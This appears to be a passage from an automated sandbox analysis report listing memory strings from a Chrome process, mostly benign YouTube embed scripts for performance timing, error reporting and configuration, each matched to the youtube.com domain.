ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2393532398.000028EC063EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF68D000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}to" equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2319886197.000028EC06310000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2329678735.000028EC06310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2480776157.000028EC03324000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC1D000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false});\n document.querySelector('head').appendChild(style);\n\n if (userButtonMinWidth) {\n const userButtonStyle = document.createElement('style');\n userButtonStyle.textContent = `#toolbar-item-user {min-width: ` + userButtonMinWidth +`px;}`\n document.querySelector('head').appendChild(userButtonStyle);\n }\n }\n }\n document.querySelector('html').classList.add(...classesToAdd);\n})();","currentUrl":"https://fountainofhealth.ca/en","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2347774533.000028EC06454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}1104 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2480776157.000028EC03324000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}Q equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2485699742.000028EC0384C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2492760471.000028EC0413C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2474598295.000028EC02B94000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}` equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490296198.000028EC03F64000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2497133078.000028EC04B64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q}"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2360507496.000028EC07A88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}ce.js"},"sessionId":"26AC8CA9FC799C4CA68F0EFBB42866FD"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000003.2352362951.000028EC0648C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: {"action":"getScript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}eading .panel-title').removeClass('js-form-required form-required'); equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2500912249.000028EC06828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2360620898.000028EC06828000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {"action":"getScript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com 